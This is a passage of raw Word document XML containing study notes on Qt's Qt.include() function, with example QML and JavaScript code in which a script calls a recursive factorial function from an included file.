      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId59" w:anchor="include-method" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt.include()</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function may be used to include one JavaScript file from another.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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This copies all functions from the other file into the current file's namespace, but ignores all pragmas and imports defined in that file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE54A7" w:rsidRPr="00D815C8" w:rsidRDefault="00487A25" w:rsidP="00DE54A7">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For example, the QML code below left calls</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showCalculations()</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in</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script.js</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, which in turn can call</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factorial()</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in</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factorial.js</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, as it has included</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factorial.js</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using</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId60" w:anchor="include-method" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt.include()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w: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QtQuick</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55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>2.0</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lastRenderedPageBreak/>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"script.js"</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as</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MyScript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Item</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100</w:t>
      </w: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100</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MouseArea</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anchors.fill: parent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onClicked: {</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MyScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.showCalculations(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w: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console.log(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>"Call factorial() from QML:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w: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MyScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.factorial(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w: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55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>// script.js</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00487A25" w:rsidRPr="000D7D84"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262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D7D84">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Qt.include("factorial.js")</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showCalculations(value) {</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console.log(</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"Call factorial() from script.js:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w: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factorial(value));</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55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>// factorial.js</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factorial(a) {</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 = parseInt(a);</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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (a &lt;= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w: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return</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else</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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> a * factorial(a - </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487A25" w:rsidRPr="00D815C8" w:rsidRDefault="00487A25" w:rsidP="00487A25">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Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Notice that calling</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId61" w:anchor="include-method" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt.include()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D2D52">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>copies all functions from</w:t>
      </w:r>
      <w:r w:rsidRPr="000D2D52">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D2D52">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>factorial.js</w:t>
      </w:r>
      <w:r w:rsidRPr="000D2D52">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D2D52">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>into the</w:t>
      </w:r>
      <w:r w:rsidRPr="000D2D52">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D2D52">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MyScript</w:t>
      </w:r>
      <w:r w:rsidRPr="000D2D52">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D2D52">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>namespace</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, which means the </w:t>
      </w:r>
      <w:r w:rsidRPr="000D2D52">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML component can also access</w:t>
      </w:r>
      <w:r w:rsidRPr="000D2D52">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D2D52">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>factorial()</w:t>
      </w:r>
      <w:r w:rsidRPr="000D2D52">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D2D52">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>directly as</w:t>
      </w:r>
      <w:r w:rsidRPr="000D2D52">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D2D52">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MyScript.factorial()</w:t>
      </w:r>
      <w:r w:rsidRPr="000D2D52">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="82"/>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00D815C8" w:rsidRDefault="006F4DE5" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00250096">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://qt-project.org/doc/qt-5.1/qtqml/qtqml-javascript-hostenvironment.html" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>qt</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>project</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>org</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>doc</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>qt</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-5.1/</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>qtqml</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
